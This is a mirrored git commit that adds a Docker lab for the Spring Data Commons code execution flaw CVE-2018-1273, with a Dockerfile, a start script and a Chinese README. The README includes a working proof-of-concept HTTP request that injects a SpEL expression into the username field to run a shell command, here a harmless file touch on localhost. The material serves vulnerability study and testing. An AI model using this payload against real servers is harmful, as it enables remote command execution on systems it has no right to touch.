mirror of
https://github.com/Medicean/VulApps.git
synced 2025-06-20 09:50:45 +00:00
(Add Vul: Spring) Spring Data Commons 代码执行漏洞(CVE-2018-1273)
This commit is contained in:
parent
65a793b714
commit
36640b3040
15
s/spring/2/Dockerfile
Normal file
15
s/spring/2/Dockerfile
Normal file
@ -0,0 +1,15 @@
|
||||
FROM openjdk:8-jdk
|
||||
MAINTAINER Medici.Yan@Gmail.com
|
||||
|
||||
ENV JAR_URL http://vulapps.poetn.cc/s/spring/spring-data-commons_CVE-2018-1273.jar
|
||||
|
||||
COPY src/start.sh /start.sh
|
||||
|
||||
RUN set -x \
|
||||
&& chmod a+x /start.sh \
|
||||
&& mkdir /htdocs \
|
||||
&& wget -qO /htdocs/ROOT.jar $JAR_URL
|
||||
|
||||
EXPOSE 8080
|
||||
|
||||
CMD ["/start.sh"]
|
52
s/spring/2/README.md
Normal file
52
s/spring/2/README.md
Normal file
@ -0,0 +1,52 @@
|
||||
## Spring Data Commons 代码执行漏洞(CVE-2018-1273)
|
||||
|
||||
### 漏洞信息
|
||||
|
||||
- [Spring Data Commons Remote Code Execution 分析-【CVE-2018-1273】](https://xz.aliyun.com/t/2269)
|
||||
|
||||
### 获取环境:
|
||||
|
||||
1. 拉取镜像到本地
|
||||
|
||||
```
|
||||
$ docker pull medicean/vulapps:s_spring_2
|
||||
```
|
||||
|
||||
2. 启动环境
|
||||
|
||||
```
|
||||
$ docker run -d -p 8080:8080 medicean/vulapps:s_spring_2
|
||||
```
|
||||
> `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。
|
||||
|
||||
### 使用与利用
|
||||
|
||||
访问 `http://你的 IP 地址:端口号/`, 假设启动的端口号为 8080
|
||||
|
||||
#### PoC
|
||||
|
||||
1. 访问 `http://127.0.0.1:8080/users`,测试服务是否启动成功
|
||||
|
||||
2. 发送如下数据包,执行命令为: `/bin/touch /tmp/vuln`
|
||||
|
||||
```
|
||||
POST /users?page=&size=5 HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Proxy-Connection: keep-alive
|
||||
Content-Length: 138
|
||||
Cache-Control: max-age=0
|
||||
Origin: http://127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Referer: http://127.0.0.1:8080/users
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||||
|
||||
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/touch /tmp/vuln")]=test&password=test&repeatedPassword=test
|
||||
```
|
||||
|
||||
### 参考链接
|
||||
|
||||
- [Spring Data Commons Remote Code Execution 分析-【CVE-2018-1273】](https://xz.aliyun.com/t/2269)
|
5
s/spring/2/src/start.sh
Normal file
5
s/spring/2/src/start.sh
Normal file
@ -0,0 +1,5 @@
|
||||
#!/bin/bash
|
||||
while [[ true ]]; do
|
||||
java -jar /htdocs/ROOT.jar
|
||||
sleep 5
|
||||
done
|
@ -1,3 +1,4 @@
|
||||
# Spring
|
||||
|
||||
* [Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)](./1/)
|
||||
* [Spring Data Commons 代码执行漏洞(CVE-2018-1273)](./2/)
|
||||
|
Loading…
x
Reference in New Issue
Block a user